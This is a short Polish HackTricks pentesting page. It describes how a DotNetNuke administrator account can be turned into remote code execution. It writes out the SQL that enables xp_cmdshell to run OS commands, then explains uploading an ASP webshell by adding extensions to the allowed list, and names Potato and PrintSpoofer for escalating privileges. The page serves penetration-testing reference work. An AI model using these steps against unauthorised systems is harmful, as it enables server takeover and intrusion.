DotNetNuke (DNN)
Reading time: 2 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
DotNetNuke (DNN)
Jeśli zalogujesz się jako administrator w DNN, łatwo uzyskać RCE.
RCE
Via SQL
Konsola SQL jest dostępna na stronie Settings
, gdzie możesz włączyć xp_cmdshell
i uruchamiać polecenia systemu operacyjnego.
Użyj tych linii, aby włączyć xp_cmdshell
:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
A następnie naciśnij "Run Script", aby uruchomić te zapytania SQL.
Następnie użyj czegoś takiego, jak poniżej, aby uruchomić polecenia systemu operacyjnego:
xp_cmdshell 'whoami'
Via ASP webshell
W Settings -> Security -> More -> More Security Settings
możesz dodać nowe dozwolone rozszerzenia w sekcji Allowable File Extensions
, a następnie klikając przycisk Save
.
Dodaj asp
lub aspx
i następnie w /admin/file-management
prześlij asp webshell o nazwie shell.asp
, na przykład.
Następnie uzyskaj dostęp do /Portals/0/shell.asp
, aby uzyskać dostęp do swojego webshella.
Privilege Escalation
Możesz eskalować uprawnienia używając Potatoes lub PrintSpoofer, na przykład.
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.